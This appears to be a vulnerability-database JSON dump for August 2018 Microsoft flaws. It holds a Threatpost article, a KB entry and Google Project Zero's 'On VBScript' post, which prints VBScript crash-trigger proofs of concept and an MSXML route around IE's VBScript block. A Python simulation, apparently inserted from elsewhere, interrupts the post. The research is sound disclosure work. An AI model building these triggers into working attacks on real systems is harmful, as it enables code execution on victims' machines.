These speculative side-channel flaws were also [disclosed today](<https://threatpost.com/intel-cpus-afflicted-with-fresh-speculative-execution-flaws/135096/>) by Intel.\n\n\u201cCorrecting these vulnerabilities requires both a software and firmware (microcode) update,\u201d said Goettl. \u201cAs a mitigation, Microsoft does recommend disabling hyper-threading which can have a major performance impact.\u201d\n\nMicrosoft also pushed a security advisory, [ADV180020](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180020>), for flaws in impacted Adobe products, which were also touched on by Adobe in a separate Patch Tuesday release earlier [today.](<https://threatpost.com/adobe-patch-tuesday-release-fixes-critical-acrobat-and-reader-flaws/135058/>)\n\n## Other Flaws\n\nThere are also several memory corruption vulnerabilities in Microsoft Edge, Internet Explorer 9-11 and the Chakra Scripting Engine (including CVE-2018-8380, CVE-2018-8381 and CVE-2018-8385).\n\n\u201cThis vulnerability occurs when Microsoft Edge accesses object in memory, which could allow an attacker to execute code on the victim\u2019s system,\u201d Allan Liska, threat intelligence analyst at Recorded Future, told Threatpost. 
\u201cThis type of memory corruption is usually exploited using a JavaScript, or other client-side scripting language, on a website the attacker owns or has compromised.\u201d\n\nAlso, Microsoft SQL Server 2016 and 2017 contain a buffer overflow [vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>) (CVE-2018-8273) that can be remotely exploited with a specific SQL query directed to the server.\n\n\u201cThis vulnerability is particularly concerning because it is relatively trivial to execute and many Microsoft SQL Servers are publicly accessible, which may mean an immediate uptick in attacks against these servers,\u201d said Liska.\n\nMicrosoft also patched a Microsoft Graphics RCE vulnerability (CVE-2018-8344) in Windows 7-10 and Windows Server 2008-2016, which exists in the way that Microsoft handles certain embedded fonts.\n\nFinally, Microsoft Exchange, versions 2010-2016, contains a memory corruption vulnerability (CVE-2018-8302) that, when properly exploited, would also enable RCE. To exploit this vulnerability, an attacker needs to send a specially crafted email to any account using the targeted Exchange Server. When the Exchange Server processes the incoming malicious email, it triggers the memory corruption vulnerability and is able to execute the attached code.\n\nMicrosoft\u2019s Patch Tuesday comes after the company found itself in hot water last month after its new update model caused stability issues for Windows operating systems and applications, particularly in July. 
The model irked customers so much that enterprise patching veteran Susan Bradley wrote an [open letter](<https://www.computerworld.com/article/3293440/microsoft-windows/an-open-letter-to-microsoft-management-re-windows-updating.html>) to Microsoft executives expressing the \u201cdissatisfaction your customers have with the updates released for Windows desktops and servers in recent months.\u201d\n", "modified": "2018-08-14T20:42:41", "published": "2018-08-14T20:42:41", "id": "THREATPOST:961233DDAF80602C2DDEC2B819294F05", "href": "https://threatpost.com/patch-tuesday-microsoft-addresses-two-zero-days-in-60-flaw-roundup/135103/", "type": "threatpost", "title": "Patch Tuesday: Microsoft Addresses Two Zero-Days in 60-Flaw Roundup", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "googleprojectzero": [{"lastseen": "2020-12-14T19:21:41", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2018-8373"], "description": "Posted by Ivan Fratric, Google Project Zero\n\nIntroduction\n\nVulnerabilities in the [VBScript](<https://en.wikipedia.org/wiki/VBScript>) scripting engine are a well-known way to attack Microsoft Windows. In order to reduce this attack surface, in Windows 10 Fall Creators Update, Microsoft [disabled](<https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/#rwFwvJ9JSX18pj2h.97>) VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. Yet this did not deter attackers from using it - in 2018 alone, there have been at least two instances of 0day attacks using vulnerabilities in VBScript: [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174>) and [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>). 
In both of these cases, the delivery method for the exploit was Microsoft Office files with an embedded object which caused malicious VBScript code to be processed using the Internet Explorer engine. For a more detailed analysis of the techniques used in these exploits please refer to their analysis by the original discoverers [here](<https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/>) and [here](<https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/>).\n\nBecause of this dubious popularity of VBScript, multiple security researchers took up the challenge of finding (and reporting) other instances of VBScript vulnerabilities, including a number of variants of those vulnerabilities used in the wild. Notably, researchers working with the Zero Day Initiative discovered [multiple instances of vulnerabilities](<https://www.thezdi.com/blog/2018/5/15/its-time-to-terminate-the-terminator>) relying on the VBScript Class_Terminate callback and Yuki Chen of Qihoo 360 Vulcan Team discovered [multiple variants](<http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html>) of CVE-2018-8174 (one of the exploits used in the wild).\n\nAs a follow-up to those events, this blog post tries to answer the following question: Despite all of the existing efforts from Microsoft and the security community, how easy is it to still discover new VBScript vulnerabilities? 
And how strong are Windows policies intended to stop these vulnerabilities from being exploited?\n\nEven more VBScript vulnerabilities\n\nThe approach we used to find VBScript vulnerabilities was quite straightforward: We used the already published [Domato](<https://github.com/googleprojectzero/domato>) grammar fuzzing engine and wrote a grammar that describes the built-in VBScript functions, various callbacks and other common patterns. This is the same approach we used successfully [previously](<https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html>) to find multiple vulnerabilities in the JScript scripting engine and it was relatively straightforward to do the same for VBScript. The grammar and the generator script can be found [here](<https://github.com/googleprojectzero/domato/tree/master/vbscript>).\n\nThis approach resulted in uncovering three new VBScript vulnerabilities that we reported to Microsoft and are now fixed. The vulnerabilities are interesting, not because they are complex, but precisely for the opposite reason: they are pretty straightforward (yet, somehow, still survived to this day). 
Additionally, in several cases, there are parallels that can be drawn between the vulnerabilities used in the wild and the ones we found.\n\nTo demonstrate this, before taking a look at the first vulnerability the fuzzer found, let\u2019s take a look at a PoC for the latest VBScript 0day found in the wild:\n\n```vbscript\nClass MyClass\n  Dim array\n\n  Private Sub Class_Initialize\n    ReDim array(2)\n  End Sub\n\n  Public Default Property Get P\n    ReDim preserve array(1)\n  End Property\nEnd Class\n\nSet cls = new MyClass\ncls.array(2) = cls\n```\n\nTrend Micro has a more detailed [analysis](<https://blog.trendmicro.com/trendlabs-security-intelligence/use-after-free-uaf-vulnerability-cve-2018-8373-in-vbscript-engine-affects-internet-explorer-to-run-shellcode/>), but in short, the most interesting line is\n\n```vbscript\ncls.array(2) = cls\n```\n\nIn it, the left side is evaluated first and the address of the variable at cls.array(2) is computed. Then, the right side is evaluated, and because cls is an object of type MyClass which has a default property getter, it triggers a callback. Inside the callback, the array is resized and the address of the variable computed previously is no longer valid - it now points to freed memory. This results in a write to freed memory when the line above gets executed.\n\nNow, let\u2019s compare this sample to the PoC for the first issue we found:\n\n```vbscript\nClass MyClass\n  Private Sub Class_Terminate()\n    dict.RemoveAll\n  End Sub\nEnd Class\n\nSet dict = CreateObject(\"Scripting.Dictionary\")\nSet dict.Item(\"foo\") = new MyClass\ndict.Item(\"foo\") = 1\n```\n\nAt first glance, this might not appear all that similar, but in reality they are. The line that triggers the issue is\n\n```vbscript\ndict.Item(\"foo\") = 1\n```\n\nIn it, once again, the left side is evaluated first and the address of dict.Item(\"foo\") is computed. 
Then, a value is assigned to it, but because there is already a value there, it needs to be cleared first. Since the existing value is of the type MyClass, this results in a Class_Terminate() callback, in which the dict is cleared. This, once again, means that the address computed when evaluating the left side of the expression now points to freed memory.\n\nIn both of these cases, the pattern is:\n\n 1. Compute the address of a member variable of some container object\n\n 2. Assign a value to it\n\n 3. The assignment causes a callback in which the container storage is freed\n\n 4. The assignment then writes to freed memory\n\nThe two differences between these two samples are that:\n\n 1. In the first case, the container used was an array, and in the second it was a dictionary\n\n 2. In the first case, the callback used was a default property getter, and in the second case, the callback was Class_Terminate.\n\nPerhaps it was because of this similarity with a publicly known sample that this variant was also independently discovered by a researcher working with Trend Micro's Zero Day Initiative and Yuki Chen of Qihoo 360 Vulcan Team. Given this similarity, it would not be surprising if the author of the 0day that was used in the wild also knew about this variant.\n\nThe second bug we found wasn\u2019t directly related to any 0days found in the wild (that we know about); however, it is a classic example of a scripting engine vulnerability:\n\nClass class1\nPublic Default Property Get x\nReDim arr(1)\nEnd Property\nEnd Class\n\nset c = new class1\narr = Array(\"b\", \"b\", \"a\", \"a\", c)\nCall Filter(arr, \"a\")\n\nIn it, a Filter function gets called on an array. The Filter function walks the array and returns another array containing just the elements that match the specified substring (\"a\" in this case). 
Because one of the members of the input array is an object with a default property getter, this causes a callback, and in the callback the input array is resized. This results in reading variables out-of-bounds once we return from the callback into the implementation of the Filter function.\n\nA possible reason why this bug survived this long could be that the implementation of the Filter function tried to prevent bugs like this by checking, at every iteration of the algorithm, whether the array size is larger than (or equal to) the number of matching objects. However, this check fails to account for array members that do not match the given substring (such as the elements with the value \"b\" in the PoC).\n\nIn their advisory, Microsoft (initially) incorrectly classified the impact of this issue as an infoleak. While the bug results in an out-of-bounds read, what is read out-of-bounds (and subsequently returned to the user) is a VBScript variable. If attacker-controlled data is interpreted as a VBScript variable, this can result in a lot more than just an infoleak and can easily be converted into code execution. This issue is a good example of why, in general, an out-of-bounds read can be more than an infoleak: it always depends on precisely what kind of data is being read and how it is used.\n\nThe third bug we found is interesting because it is in code that had already been heavily worked on in order to address CVE-2018-8174 and the [variants](<http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html>) found by the Qihoo 360 Vulcan Team. 
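Before moving on to the third bug, here is an added Python model (not Project Zero's code and not the VBScript engine) of the two bugs above: the assignment pattern from the in-the-wild PoC, where the element address is resolved before the right-hand side's callback frees the array, and the Filter() guard that compares array size against the match count instead of the index being read. Everything in it is constructed and hypothetical: the VBArray and DefaultGetterObject classes, a generation counter standing in for "is this storage still live", and a two-pass Filter that counts matches and then copies them.

```python
"""Constructed model of two VBScript bugs discussed above: the "assignment
triggers a callback that frees the container" pattern and the Filter()
out-of-bounds read. Not Project Zero's code or the VBScript engine. Assumed:
VBArray stands in for the engine's array storage (ReDim swaps it, "freeing"
the old copy), Filter runs two passes (count, then copy), and touching freed
or out-of-bounds memory raises StaleMemoryAccess instead."""

class StaleMemoryAccess(Exception):
    """Where the real engine would read or write stale memory."""

class SubscriptOutOfRange(Exception):
    """A clean script-level error: the safe way to fail."""

class VBArray:
    """Array whose backing storage is replaced on every ReDim."""
    def __init__(self, items):
        self.items = list(items)
        self.generation = 0  # incremented whenever storage is reallocated

    def redim(self, upper, preserve=False):
        """ReDim [Preserve] arr(upper): allocate new storage, free the old."""
        kept = self.items[:upper + 1] if preserve else []
        self.items = kept + [None] * (upper + 1 - len(kept))
        self.generation += 1

    def read(self, i):
        if i >= len(self.items):
            raise StaleMemoryAccess(f"read of index {i}, length {len(self.items)}")
        return self.items[i]

    def resolve_slot(self, i):
        """Left-hand-side evaluation: compute the element's address now."""
        if i >= len(self.items):
            raise SubscriptOutOfRange(i)
        return (self.generation, i)

    def write_slot(self, slot, value):
        generation, i = slot
        if generation != self.generation:  # storage freed since the LHS ran
            raise StaleMemoryAccess("address points into freed storage")
        self.items[i] = value

class DefaultGetterObject:
    """Class with a Public Default Property Get that runs on_get."""
    def __init__(self, on_get):
        self.on_get = on_get

def to_string(value):
    """String coercion; an object's default property getter runs here."""
    if isinstance(value, DefaultGetterObject):
        value = value.on_get()  # the callback; returns Empty (None) here
    return "" if value is None else str(value)

def outcome(action):
    """Run one PoC and report what the engine would have done."""
    try:
        return action()
    except StaleMemoryAccess as e:
        return f"stale memory access: {e}"
    except SubscriptOutOfRange:
        return "subscript out of range"

def assign_element(arr, index, rhs, hardened=False):
    """arr(index) = rhs(): LHS address first, then the RHS, which may call back."""
    slot = None if hardened else arr.resolve_slot(index)  # address before callback
    value = rhs()
    if hardened:  # evaluate the RHS first and only then resolve the slot
        slot = arr.resolve_slot(index)
    arr.write_slot(slot, value)
    return "ok"

def assignment_poc(hardened=False):
    """The in-the-wild PoC: ReDim array(2), then cls.array(2) = cls."""
    arr = VBArray([None] * 3)
    cls = DefaultGetterObject(lambda: arr.redim(1, preserve=True))  # Get P
    return outcome(lambda: assign_element(arr, 2, lambda: to_string(cls), hardened))

def vb_filter(arr, needle, hardened=False):
    """Filter(arr, needle): the page's count-based guard vs an index guard."""
    n = len(arr.items)  # bound captured once, before any callback can run
    match_count = 0
    for i in range(n):  # pass 1: count matches; coercion may run a callback
        if needle in to_string(arr.read(i)):
            match_count += 1
    result = []
    for i in range(n):  # pass 2: copy the matching elements
        guard_hit = i >= len(arr.items) if hardened else len(arr.items) < match_count
        if guard_hit:  # hardened: index vs live size; original: size vs match count
            raise SubscriptOutOfRange(i)
        value = arr.read(i)
        if needle in to_string(value):
            result.append(value)
    return result

def filter_poc(hardened=False):
    """arr = Array("b", "b", "a", "a", c), where c's getter does ReDim arr(1)."""
    arr = VBArray(["b", "b", "a", "a", None])
    arr.items[4] = DefaultGetterObject(lambda: arr.redim(1))
    return outcome(lambda: vb_filter(arr, "a", hardened))
```

With the original guard the Filter PoC passes the size check (2 elements left, 2 matches) and then reads index 2 of a 2-element array, exactly the non-matching-elements gap the text describes; the hardened variants fail closed with a script-level error instead.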
In fact, it is possible that the bug we found was introduced when fixing one of the previous issues.\n\nWe initially became aware of the problem when the fuzzer generated a sample that resulted in a NULL-pointer dereference with the following (minimized) PoC:\n\nDim a, r\n\nClass class1\nEnd Class\n\nClass class2\nPrivate Sub Class_Terminate()\nset a = New class1\nEnd Sub\nEnd Class\n\na = Array(0)\nset a(0) = new class2\nErase a\nset r = New RegExp\nx = r.Replace(\"a\", a)\n\nWhy does this result in a NULL-pointer dereference? This is what happens:\n\n 1. An array a is created. At this point, the type of a is an array.\n\n 2. An object of type class2 is set as the only member of the array.\n\n 3. The array a is deleted using the Erase function. This also clears all array elements.\n\n 4. Since class2 defines a custom destructor, it gets called during the Erase function call.\n\n 5. In the callback, we change the value of a to an object of type class1. The type of a is now an object.\n\n 6. Before Erase returns, it sets the value of variable a to NULL. Now, a is a variable with the type object and the value NULL.\n\n 7. In some cases, when a gets used, this leads to a NULL-pointer dereference.\n\nBut can this scenario be used for more than a NULL-pointer dereference? To answer this question, let\u2019s look at step 5. In it, the value of a is set to an object of type class1. This assignment necessarily increases the reference count of the class1 object. However, later, the value of a is going to be set to NULL without decrementing the reference count. When the PoC above finishes executing, there will be an object of type class1 somewhere in memory with a reference count of 1, but no variable will actually point to it. This leads us to a reference leak scenario. 
For example, consider the following PoC:\n\nDim a, c, i\n\nClass class1\nEnd Class\n\nClass class2\nPrivate Sub Class_Terminate()\nset a = c\nEnd Sub\nEnd Class\n\nSet c = New class1\nFor i = 1 To 1000\na = Array(0)\nset a(0) = new class2\nErase a\nNext\n\nUsing the principle described above, the PoC above will increase the reference count of the object held in c to 1000, when in reality only one variable (c) holds a reference to it. Since a reference count in VBScript is a 32-bit integer, if we increase it a sufficient number of times, it is going to overflow and the object might get freed while there are still references to it.\n\nThe above is not exactly true, because custom classes in VBScript have protection against reference count overflows; however, this is not the case for built-in classes, such as RegExp. So, we can just use an object of type RegExp instead of class1, and the reference count will overflow eventually. As every reference count increase requires a callback, \u201ceventually\u201d here could mean several hours, so the only realistic exploitation scenario would be someone opening a tab/window and forgetting to close it - not really an APT-style attack (unlike the previous bugs discussed), but still a good example of how the design of VBScript makes it very difficult to fix the object lifetime issues.\n\nHunting for reference leaks\n\nIn an attempt to find more reference leak issues, a simple modification was made to the fuzzer: a counter was added and, every time a custom object was created, this counter was increased in the class constructor. Similarly, every time an object was deleted, this counter was decreased in the class destructor. 
When a sample finishes executing and all variables have been cleared, if this counter is larger than 0, this means there was a reference leak somewhere.\n\nThis approach immediately resulted in a variant of the previously described reference leak, which is almost identical but uses [ReDim](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1673>) instead of Erase. Microsoft responded that they consider this a duplicate of the Erase issue.\n\nUnfortunately, there is a problem with this approach that prevents it from discovering more interesting reference leak issues: the approach can\u2019t distinguish between \u201cpure\u201d reference leak issues and reference leak issues that are also memory leak issues and thus don\u2019t necessarily have the same security impact. One example of an issue this approach gets stuck on is circular references (imagine that object A has a reference to object B and object B also has a reference to object A). However, we still believe that finding reference leaks can be automated, as described later in this blog post.\n\nBypassing VBScript execution policy\n\nAs mentioned in the introduction, in Windows 10 Fall Creators Update, Microsoft [disabled](<https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/#rwFwvJ9JSX18pj2h.97>) VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. This is certainly a step in the right direction. However, let\u2019s also examine the weaknesses in this approach and its implementation.\n\nFirstly, note that, by default, this policy only applies to the Internet Zone and the Restricted Sites Zone. If a script runs (or an attacker can make it run) in the Local Intranet Zone or the Trusted Sites Zone, the policy simply does not apply. 
Presumably this is to strike a balance between the security of home users and the needs of business users that still rely on VBScript on their local intranet. However, it is somewhat debatable whether leaving potential gaps in end-user security vs. having (behind-the-times) businesses that still rely on VBScript change a default setting strikes the right balance. In the future, we would prefer to see VBScript completely disabled by default in the Internet Explorer engine.\n\nSecondly, when implementing this policy, Microsoft forgot to account for some places where VBScript code can be executed in Internet Explorer. Specifically, Internet Explorer supports the [MSXML](<https://en.wikipedia.org/wiki/MSXML>) object, which has the ability to run VBScript code in XSL Transformations, as in the code below.\n\n<?xml version='1.0'?>\n<xsl:stylesheet version=\"1.0\"\nxmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\"\nxmlns:msxsl=\"urn:schemas-microsoft-com:xslt\"\nxmlns:user=\"http://mycompany.com/mynamespace\">\n\n<msxsl:script language=\"vbscript\" implements-prefix=\"user\">\nFunction xml(str)\na = Array(\"Hello\", \"from\", \"VBscript\")\nxml = Join(a)\nEnd Function\n</msxsl:script>\n\n<xsl:template match=\"/\">\n<xsl:value-of select=\"user:xml(.)\"/>\n</xsl:template>\n\n</xsl:stylesheet>\n\nMicrosoft did not disable VBScript execution for MSXML, even for websites running in the Internet Zone. This issue was [reported](<https://bugs.chromium.org/p/project-zero/issues/detail?id=1669>) to Microsoft and was fixed at the time of publishing this blog post.\n\nYou might think that all of these issues are avoidable if Internet Explorer isn\u2019t used for web browsing, but unfortunately the problem with VBScript (and IE in general) runs deeper than that. 
Most Windows applications that render web content do it using the Internet Explorer engine, as is the case with Microsoft Office, which was used in the recent 0days. It should be said that, earlier this year, Microsoft disabled VBScript creation in Microsoft Office (at least in the most recent version), so this popular vector has been blocked. However, there are other applications, including those from third parties, that also use the IE engine for rendering web content.\n\nFuture research ideas\n\nDuring this research, some ideas came up that we didn\u2019t get around to implementing. Rather than sitting on them, we\u2019ll list them here in case a reader looking for a light research project wants to pick one of them up:\n\n * Combine the [VBScript](<https://github.com/googleprojectzero/domato/tree/master/vbscript>) fuzzer with the [JScript](<https://github.com/googleprojectzero/domato/tree/master/jscript>) fuzzer in a way that allows VBScript to access JScript objects/functions and vice versa. Perhaps issues can be found in the interaction of these two engines. Possibly callbacks from one engine (e.g. a default property getter from VBScript) can be triggered in unexpected places in the other engine.\n\n * Create a better tool for finding reference leaks. This could be accomplished by running IE in the debugger and setting breakpoints on object creation/deletion to track the addresses of live objects. Afterwards, memory could be scanned similarly to how it was done [here](<https://github.com/googleprojectzero/p0tools/blob/master/JITServer/cfgtool.cpp>) to find whether there are any objects alive (with reference count >0) that are not actually referenced from anywhere else in memory (note: Page Heap should be used to ensure there are no stale references from freed memory).\n\n * Other objects. During the previous year, a number of bugs were found that rely on the Scripting.Dictionary object. 
Scripting.Dictionary is not one of the built-in VBScript objects, but rather needs to be instantiated using the CreateObject function. Are there any other objects available from VBScript that would be interesting to fuzz?\n\nConclusion\n\nVBScript is a scripting engine from a time when a lot of today\u2019s security considerations weren\u2019t at the forefront of anyone\u2019s thoughts. Because of this, it shouldn\u2019t be surprising that it is a crowd favorite when it comes to attacking Windows systems. And although it has received a lot of attention from the security community recently, new vulnerabilities are still straightforward to find.\n\nMicrosoft made some good steps in attack surface reduction recently. However, in combination with an execution policy bypass and various applications relying on the Internet Explorer engine to render web content, these bugs could still endanger even users following best practices on up-to-date systems. We hope that, in the future, Microsoft is going to take further steps to more comprehensively remove VBScript from all security-relevant contexts.\n", "modified": "2018-12-19T00:00:00", "published": "2018-12-19T00:00:00", "id": "GOOGLEPROJECTZERO:7105AC02468FA173C8BDB7936612EE77", "href": "https://googleprojectzero.blogspot.com/2018/12/on-vbscript.html", "type": "googleprojectzero", "title": "\nOn VBScript\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:40:43", "bulletinFamily": "microsoft", "cvelist": ["CVE-2018-8345", "CVE-2018-8346"], "description": "<html><body><p>Resolves a vulnerability in Windows Server 2008.</p><h2>Summary</h2><div class=\"kb-summary-section section\">A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed.<br/><br/>To learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). 
<br/><ul class=\"sbody-free_list\"><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8346\" id=\"kb-link-2\" target=\"_self\"> CVE-2018-8346</a></li><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8345\" id=\"kb-link-2\" target=\"_self\"> CVE-2018-8345</a></li></ul> </div><h2>How to obtain and install the update</h2><div class=\"kb-resolution-section section\"> <h3 class=\"sbody-h3\">Method 1: Windows Update</h3><div class=\"kb-collapsible kb-collapsible-expanded\">This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see <a href=\"https://www.microsoft.com/en-us/safety/pc-security/updates.aspx\" id=\"kb-link-13\" target=\"_self\">Windows Update: FAQ</a>. </div><h3 class=\"sbody-h3\">Method 2: Microsoft Update Catalog</h3><div class=\"kb-collapsible kb-collapsible-expanded\">To get the stand-alone package for this update, go to the <a href=\"http://catalog.update.microsoft.com/v7/site/search.aspx?q=4340939\" id=\"kb-link-14\" target=\"_self\">Microsoft Update Catalog</a> website. <br/></div></div><strong class=\"sbody-strong\">Important </strong><ul class=\"sbody-free_list\"><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. 
</li></ul><h2>Deployment information</h2>For deployment details for this security update, go to the following article in the Microsoft Knowledge Base:<br/> <div class=\"indent\"> <a href=\"https://support.microsoft.com/en-us/help/20180814\" id=\"kb-link-9\">Security update deployment information: August 14, 2018</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></td></tr><tr><td faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update: FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></td></tr></tbody></table><a class=\"bookmark\" id=\"fileinfo\"></a></div><h2>File Information</h2><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">File hash information</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>SHA1 hash</th><th>SHA256 
hash</th></tr><tr><td>Windows6.0-KB4340939-x86.msu</td><td>B88325BF4AC01BAD639E163D5E1484DC9F2E13F1</td><td>DF0756DAF3215FFA9B7BFF43EE602AAD71E006056614AEAEAC9F2092A6C8EF72</td></tr><tr><td>Windows6.0-KB4340939-ia64.msu</td><td>64FC082BC23A1B6942152A2AFD5F0B4DAC07AE68</td><td>33EB4203D67988669EED689F530AD4771D7F36265DAC7EE61ACA2B36C73D4DBA</td></tr><tr><td>Windows6.0-KB4340939-x64.msu</td><td>27B6A52C60ED2845B4F7A8F1C774047407851FAD</td><td>6C915207E37BF3B86EF82533FFEAD3B2CDACB59CD1199813B5D8BDD2FEDA4916</td></tr></tbody></table></td></tr></tbody></table><p><strong>File information</strong><br/><span>The English (United States) version of this software update installs files that have the attributes that are listed in the following tables. The dates and the times for these files are listed in Coordinated Universal Time (UTC). The dates and the times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and the times may change when you perform certain operations on the files.</span><br/><br/><strong>Windows Server 2008 file information</strong></p><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><div class=\"alert-title\">Notes</div><div class=\"row\"><div class=\"col-xs-24\"><p>The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.</p></div></div></div></div><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x86-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong 
class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>231,936</td><td>20-Jun-2018</td><td>14:54</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported ia64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>661,504</td><td>20-Jun-2018</td><td>14:57</td><td>IA-64</td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>231,936</td><td>20-Jun-2018</td><td>14:54</td><td>x86</td></tr></tbody></table></td></tr></tbody></table><table class=\"faq-section\" faq-section=\"\"><tbody class=\"faq-panel\"><tr><td faq-panel-heading=\"\">For all supported x64-based versions</td></tr><tr><td faq-panel-body=\"\"><table class=\"table\"><tbody><tr><td><strong class=\"sbody-strong\">File name</strong></td><td><strong class=\"sbody-strong\">File version</strong></td><td><strong class=\"sbody-strong\">File size</strong></td><td><strong class=\"sbody-strong\">Date</strong></td><td><strong class=\"sbody-strong\">Time</strong></td><td><strong class=\"sbody-strong\">Platform</strong></td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>318,464</td><td>20-Jun-2018</td><td>14:39</td><td>x64</td></tr><tr><td>Msshsq.dll</td><td>7.0.6002.24434</td><td>231,936</td><td>20-Jun-2018</td><td>14:54</td><td>x86</td></tr></tbody></table></td></tr></tbody></table></body></html>", "edition": 2, "modified": "2018-08-14T17:12:48", "id": "KB4340939", "href": 
"https://support.microsoft.com/en-us/help/4340939/", "published": "2018-08-14T00:00:00", "title": "Description of the security update for the remote code execution vulnerability in Windows Server 2008: August 14, 2018", "type": "mskb", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2020-09-02T11:58:50", "bulletinFamily": "info", "cvelist": ["CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8345", "CVE-2018-8339", "CVE-2018-8344", "CVE-2018-8394", "CVE-2018-8397", "CVE-2018-8396", "CVE-2018-8373", "CVE-2018-8404", "CVE-2018-8348", "CVE-2018-8346", "CVE-2018-8341", "CVE-2018-8385", "CVE-2018-8371", "CVE-2018-8389", "CVE-2018-8398", "CVE-2018-8353", "CVE-2018-8349"], "description": "### *Detect date*:\n08/14/2018\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Eextended Support Update). Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows 10 Version 1803 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1709 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server, version 1803 (Server Core Installation) \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 Version 1709 for 32-bit Systems \nWindows 10 Version 1803 for 32-bit Systems \nWindows Server 2016 (Server Core installation) \nWindows Server, version 1709 (Server Core Installation) \nInternet Explorer 9 \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 
